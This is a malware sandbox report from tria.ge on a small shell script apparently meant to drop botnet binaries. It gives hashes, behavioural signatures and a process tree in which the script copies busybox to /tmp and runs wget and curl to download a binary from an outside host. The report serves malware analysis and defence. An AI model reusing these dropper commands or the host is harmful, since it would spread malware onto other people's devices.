Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

4

Static

static

1

69f4dcd1de...fe4.sh

ubuntu-18.04-amd64

3

69f4dcd1de...fe4.sh

debian-9-armhf

4

69f4dcd1de...fe4.sh

debian-9-mips

3

69f4dcd1de...fe4.sh

debian-9-mipsel

3

Analysis

  • max time kernel
    148s
  • max time network
    2s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    15/07/2024, 14:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

  • Size

    2KB

  • MD5

    1ffa7d5e3a236cf0d6981d07e1b90406

  • SHA1

    9bdae03e2410b108144841c466d1e769fea3a9ce

  • SHA256

    69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4

  • SHA512

    6f2aea4615c2f2cf06fc7dd92d9dd24f8b79d3a89d9fb17a35dcd9170ed12f7b5c238ee64b99dfd19686cdccfca62580a4285cedbad11e4cc39315e0f8bba284

Score
4/10
antivm

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
    /tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
    1⤵
      PID:645
      • /bin/cp
        cp /bin/busybox /tmp/
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:647
      • /usr/bin/wget
        wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
        2⤵
          PID:649
        • /usr/bin/curl
          curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          PID:658

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/busybox
        Filesize

        507KB

        MD5

        e588bcf03ae78237b58899d35f50c570

        SHA1

        2194732ebbefbc27bdae876c77f2a97a20175710

        SHA256

        2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

        SHA512

        904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

        Download Submit